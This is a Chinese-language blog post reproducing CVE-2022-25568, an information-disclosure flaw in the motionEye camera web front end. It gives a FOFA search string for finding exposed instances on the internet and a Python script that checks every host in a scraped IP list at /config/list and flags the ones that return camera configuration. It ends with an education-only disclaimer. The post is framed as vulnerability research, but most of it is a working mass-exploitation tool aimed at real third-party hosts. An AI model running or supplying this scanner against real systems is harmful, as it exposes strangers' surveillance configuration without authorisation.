参考:
- MotionEye 视频监控组件 list 信息泄漏洞 CVE-2022-25568 | PeiQi文库 (wgpsec.org)
一、漏洞描述:
motionEye是用Python写的motion的Web前端,它可以监视视频信号并检测运动。它可以与多种类型的摄像机配合使用,也可以与电影文件一起使用,从而使您可以分析录制的视频,其中存在一个信息泄漏漏洞,通过构造特定的URL即可获取服务器敏感信息
漏洞影响
- MotionEye <= v0.42.1
二、fofa搜索:
banner="motionEye"
这里可以写的脚本将fofa上的ip爬取保存,或者你们百度搜索应该也有:Python教程:如何用Python编写FOFA爬虫获取信息?_fofa python-CSDN博客
验证POC
/config/list三、漏洞复现
这里我就根据原文提供的验证POC编写脚本进行批量验证复现
import requests
# 读取文件中的 URL
with open('ip.txt', 'r') as file:
urls = file.readlines()
# 逐个验证 URL
for url in urls:
url = url.strip() # 去掉换行符
full_url = f"{url}/config/list"
try:
response = requests.get(full_url, timeout=5) # 设置超时时间为 5 秒
if response.status_code == 200:
if 'cameras' in response.text:
print(f"URL: {full_url} - 状态码: 200 - 响应中包含 'cameras'")
except requests.exceptions.RequestException as e:
print(f"请求错误: {full_url} - 错误: {e}")
免责声明
欢迎访问我的博客。以下内容仅供教育和信息用途:
- 合法性:我不支持或鼓励非法活动。请确保遵守法律法规。
- 信息准确性:尽管我尽力提供准确的信息,但不保证其完全准确或适用。使用前请自行验证。
- 风险提示:技术使用可能带来风险,如系统损坏或数据丢失。请谨慎使用,并自行承担风险。
- 责任限制:我对使用博客内容产生的任何损害不承担责任。
- 第三方链接:博客中的链接仅为方便用户,内容不由我负责。
使用本博客即表示您同意以上条款。如果有疑问,请联系我。
![【PyVista】网状结构,标和单元[mesh,point,cell]的介绍](https://i-blog.csdnimg.cn/direct/4051db8904f84bd38342c74246ac24d2.png)
